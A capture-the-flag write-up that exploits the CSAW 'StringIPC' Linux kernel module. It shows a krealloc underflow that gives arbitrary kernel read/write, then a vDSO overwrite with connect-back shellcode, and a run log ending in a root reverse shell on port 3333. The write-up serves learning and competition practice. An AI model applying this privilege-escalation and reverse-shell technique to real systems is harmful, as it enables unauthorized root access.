This year at CSAW Finals there were a few kernel challenges. The one I will be solving in this post is StringIPC by Michael Coppola.
We are given a 64bit ubuntu 14.04.3 VM running a 3.13 kernel with SMEP, kptr_restrict, and dmesg_restrict enabled. There is a kernel module "StringIPC" loaded, but the source is given in the home directory. You can view the source here, and I will in-line some important parts in this post.

Analyzing the Kernel Module
The StringIPC module implements a basic interprocess communication system, allowing the device at /dev/csaw to be ioctl'ed to store and read data to different channels. There are 8 different ioctl codes which can be used to create, modify, and read/write to a channel:
#define CSAW_IOCTL_BASE     0x77617363

CSAW_ALLOC_CHANNEL allows you to allocate a new channel and a new buffer with a given size while CSAW_GROW_CHANNEL and CSAW_SHRINK_CHANNEL use krealloc to change the size of the channel's buffer. CSAW_READ_CHANNEL and CSAW_WRITE_CHANNEL read and write to the memory buffer that has been allocated for the channel at an offset set by CSAW_SEEK_CHANNEL. Finally CSAW_OPEN_CHANNEL and CSAW_CLOSE_CHANNEL deal with which channel the ioctl interacts with.
The bug lies in the use of krealloc in realloc_ipc_channel:
static int realloc_ipc_channel ( struct ipc_state *state, int id, size_t size, int grow )
    struct ipc_channel *channel;
    size_t new_size;
    char *new_data;

    channel = get_channel_by_id(state, id);
    if ( IS_ERR(channel) )
        return PTR_ERR(channel);

    if ( grow )
        new_size = channel->buf_size + size;
        new_size = channel->buf_size - size;

    new_data = krealloc(channel->data, new_size + 1, GFP_KERNEL);
    if ( new_data == NULL )
        return -EINVAL;

    channel->data = new_data;
    channel->buf_size = new_size;

    ipc_channel_put(state, channel);

    return 0;

By trying to shrink the channel buffer by 1 more than it was originally allocated for, new_size will underflow an become INT_MAX. When krealloc is called, 1 is added, and it overflows back to 0. From the source of krealloc, we see that if new_size is 0, it returns ZERO_SIZE_PTR:
void *krealloc(const void *p, size_t new_size, gfp_t flags) {
    void *ret;

    if (unlikely(!new_size)) {
         return ZERO_SIZE_PTR;

ZERO_SIZE_PTR is defined as ((void *)16). So after our resize channel->data = 0x10 and channel->buf_size = INT_MAX. By seeking to some offset from 0x10 we can get arbitrary read and write to kernelspace.

Exploiting the Arbitrary Write
Now that we have our read and write, we can start crafting an exploit. SMEP is on, so we cannot just overwrite something and jump to userspace to execute a prepare/commit creds shellcode. To bypass this we can use a technique of overwriting the vDSO to cause another process running as root to execute our connect-back shellcode.

The idea here is that vDSO is mapped to both kernelspace and to the virtual memory of every process, including ones running as root. This is done to help speed up calls to specific syscalls which do not require context switching to work correctly. vDSO is mapped as R/X in userspace, but R/W in kernelspace. This allows us to modify it from the kernelspace, and have it executed by users in userspace.
There are a few steps to using this technique:
1. Gain arbitrary write and read
2. Locate vDSO in kernel space
3. Create connect-back shellcode for root processes
4. Overwrite parts of vDSO with our shellcode
5. Listen for our connect-back for our root shell.
We already have step 1 from our exploits of the StringIPC module, so the next step is to locate vDSO at runtime.

Locating vDSO
Below is the kernel code for initializing the vDSO pages in kernel space.
static int __init init_vdso_vars(void) {
    int npages = (vdso_end - vdso_start + PAGE_SIZE - 1) / PAGE_SIZE;
    int i;
    char *vbase;
    vdso_size = npages << PAGE_SHIFT;
    vdso_pages = kmalloc(sizeof(struct page *) * npages, GFP_KERNEL);
    if (!vdso_pages)
        goto oom;
    for (i = 0; i < npages; i++) {
        struct page *p;
        p = alloc_page(GFP_KERNEL);
        if (!p)
            goto oom;
        vdso_pages[i] = p;
        copy_page(page_address(p), vdso_start + i*PAGE_SIZE);
    vbase = vmap(vdso_pages, npages, 0, PAGE_KERNEL);

So the vDSO pages are allocated in kernel space with alloc_page and then the pointer is stored into the vdso_pages array. So there are a few ways to locate these pages. If you are able to read /proc/kallsyms you may be able to read from vdso_pages to get the addresses directly. However that is not the case for this challenge. A second way is to search the start of every page in kernelspace for the ELF header which is part of the mapping of vDSO. We can further narrow these pages down by using signatures from vDSO. Here is my code to do that:
void* header = 0;
void* loc = 0xffffffff80000000;
size_t i = 0;
for (; loc<0xffffffffffffafff; loc+=0x1000) {
    if (header==0x010102464c457f) {
        fprintf(stderr,"%p elf\n",loc);
        //Look for 'clock_ge' signature (may not be at this offset, but happened to be)
        if (header==0x65675f6b636f6c63) {
            fprintf(stderr,"%p found it?\n",loc);

Now that we have found vDSO we can create our shellcode to overwrite it.

Connect-Back Shellcode
The connect-back shellcode can be a relatively general x86-64 shellcode, with a few modifications. The first modification is to only create the call-back shell for root processes. Since every process that calls gettimeofday will trigger our code, we don't want to be spammed with connections of non root processes. We can call syscall 0x66 (sys_getuid) and compare that against 0. If it is not, we will instead call syscall 0x60 which is sys_gettimeofday, so that we don't cause too many problems. Along the same lines, even if we are a root process, we don't want to crash things, so we can fork with syscall 0x39. In the parent we will do the same sys_gettimeofday forwarding, but in the child we will run our connect back.

The assembly for the shellcode I used can be found here. It connects to on port 3333 and executes "/bin/sh".
One last thing we should do is dump the vDSO and check at what offset gettimeofday is located at. Once we know that we can overwrite this location with our shell code and wait for some process to call it. I set up a simple cron job to help guarantee one would. My final code can be found here. Here is a run of it:
csaw@team7:~$ id
uid=1000(csaw) gid=1000(csaw) groups=1000(csaw)
csaw@team7:~$ ./a.out 
allocate fd: 3 ret: 0 id:1
Shrink: 0 err:0
0xffffffff817bc000 elf
0xffffffff817d1000 elf
0xffffffff81b6c000 elf
0xffffffff81b9e000 elf
0xffffffff81c03000 elf
0xffffffff81c03000 found it?
Listening on [] (family 0, port 3333)
Connection from [] port 3333 [tcp/*] accepted (family 2, sport 58568)
uid=0(root) gid=0(root) groups=0(root)

Final Notes
vDSO is not the only memory mapped to both kernelspace and userspace. On x86-64, vSYSCALL serves a similar function to vDSO, but also has the plus-side of being in the same location every reboot (which may be predictable by the kernel version as well.) However kernel.vsyscall64 was not enabled on this challenge, so calls were passed to vDSO instead. If vm.vdso_enable is also set to 0, then vDSO will also be bypassed and the libc wrappers will default to the normal syscalls.

vDSO/vSYSCALL overwriting is also a useful technique that can be used by exploits in interrupt context as it does not require a local process to map memory or to gain elevated credentials.

This solution was also not the only way to solve this challenge. The soultion by the author can be found here.